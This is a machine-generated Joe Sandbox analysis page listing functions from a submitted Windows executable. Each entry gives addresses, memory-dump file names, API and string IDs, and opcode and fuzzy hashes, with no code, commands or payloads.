                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: gfffffff
                                                                                                                                                                                                                                        • API String ID: 0-1523873471
                                                                                                                                                                                                                                        • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                        • Instruction ID: a0d170a25de1e97471c68bfd5b793666ff8caea07ab32e523abce0668b2bca20
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1A13563A0D789C6EF21EF65A400BA9BB90FB54BC4F648031DA8D47785EE3DD909C712
                                                                                                                                                                                                                                        Function 00007FF78DA68804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: TMP
                                                                                                                                                                                                                                        • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                        • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                        • Instruction ID: 0bbacca351061b599f00765b229f1745791277002721db45a1a9f9947d987dfa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F519002B0C24281FA64BBB6691197AD6987F44BE4FF84434DE4D477D6FE3CE809C222
                                                                                                                                                                                                                                        Function 00007FF78DA734F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                        • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                        • Instruction ID: 6e1f079d3ee519772456acab11b79f0d83492fff3bbe4eb97695af6a2edcc4c4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74B09264E0BA02D2EA083B216C86A2862A5BF58700FF80138C06D40330FE2C28E99723
                                                                                                                                                                                                                                        Function 00007FF78DA63610 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                        • Instruction ID: 8eb5adf2ebe507bd497176496766e0a5b7c2f734b134cf08a31d4b1f71eca9e9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4D1DB6AA0C642C5E728DFA5A050A7DA7A0FF05B48FB84135CE0D07795EF39DC4AC722
                                                                                                                                                                                                                                        Function 00007FF78DA59870 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                        • Instruction ID: 22e13f0c1b0dc4495ee6182960a3a4502ee4fb90eaa86eabdc7e21d5481de9a1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DC19D762181E08BD28AEA29E47947A73E1F78930DBE5406BEF8747785C73CA414DB21
                                                                                                                                                                                                                                        Function 00007FF78DA62C80 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                        • Instruction ID: a1f1df9d99e79f361a7b44f6c447652440e9d727942869a1ecd4880b2c5651c4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BB1A972A4D681C9E7649F79E040A2CBBA0F749B48FB84135CB4E47394EF29D859C722
                                                                                                                                                                                                                                        Function 00007FF78DA6E5E0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                        • Instruction ID: 724b8a96771a33184dcfc799eca2744ab5c8d1dac0433f64b0794c78452ae271
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0981F472A0C28186DB74DB59B440B7AAA91FB45794FB08235DB9D43B84EF3CDA08CB11
                                                                                                                                                                                                                                        Function 00007FF78DA76488 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
                                                                                                                                                                                                                                        • Instruction ID: 30afed4ef3c32be3ea3605005c35372a68f52125249dda3c3a911f07ceeb5580
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e679193b4f92434cc558a1156ae9b62e5a6ceff8845571a1df199170146ecb9f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB610C22E0C15246FBA8BA289444B7DE685BF40760FFC0239D69D466C5FF6DEC08C722
                                                                                                                                                                                                                                        Function 00007FF78DA61DC4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                        • Instruction ID: 443a1397d8944c37db6e23d77d5a83663081e6076588b6367165fda4696947af
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8651C576A1D652C6E7249BA8E040A38BBA0FB54B58F744231CE4C477D4EB3AEC47C751
                                                                                                                                                                                                                                        Function 00007FF78DA621D4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                        • Instruction ID: 984e4125b308fdc0e568a4371ac1cd48e4d0a84f9de52bf1df9cc309758da792
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E517F76A5C651C2E7249F69E040A28A3A0FB94F68FB44131CE4C1B7D4EB3AEC47C752
                                                                                                                                                                                                                                        Function 00007FF78DA619B4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                        • Instruction ID: cd5fce4b1f65f90b53cafdb82dfc57184c6dba80c483b256fbdcbfa91055e2fc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A51B432A1C651C2E7249FA9E040A38BBA0FB54B68FB44131DA4D577D4EB3AEC47C791
                                                                                                                                                                                                                                        Function 00007FF78DA61FD0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                        • Instruction ID: 0eaa4aead400b506798bdca607f4ccc9bb4c21ed5b6ebc87466fc073fb22695d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1851B036A5C652C6E7249B68E040B38B7A0FB44B58FB54031CE4C177E8EB3AEC46C751
                                                                                                                                                                                                                                        Function 00007FF78DA617B0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                        • Instruction ID: 3bfcad7f0dfb07c0f805a37f2ab3a0c339be2792e357d709ee5a82986354a1d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7051BE37A1C651C6E7249FA9E040A3CABA1FB45B58FB44031CA4C17798EB3AEC46C791
                                                                                                                                                                                                                                        Function 00007FF78DA61BC0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                        • Instruction ID: 62718109949da17f1dba479c59f611c5cc6d3b0b24373a8d1f369bfc637bc79e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC51AF33A1CA51C6E7249BA9E040A3CABA1FB45B58FB44131CE4C177A4EB3AEC47C751
                                                                                                                                                                                                                                        Function 00007FF78DA65DA0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                        • Instruction ID: 746e9be1905881e63524dd3d8a0fec78f6c73e0f6584988dfa765490dc825bf7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E541996280E64AC4ED55D9E85504E78A680BF62BA0EF85270DD99537C2FD0EED4EC123
                                                                                                                                                                                                                                        Function 00007FF78DA69F10 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
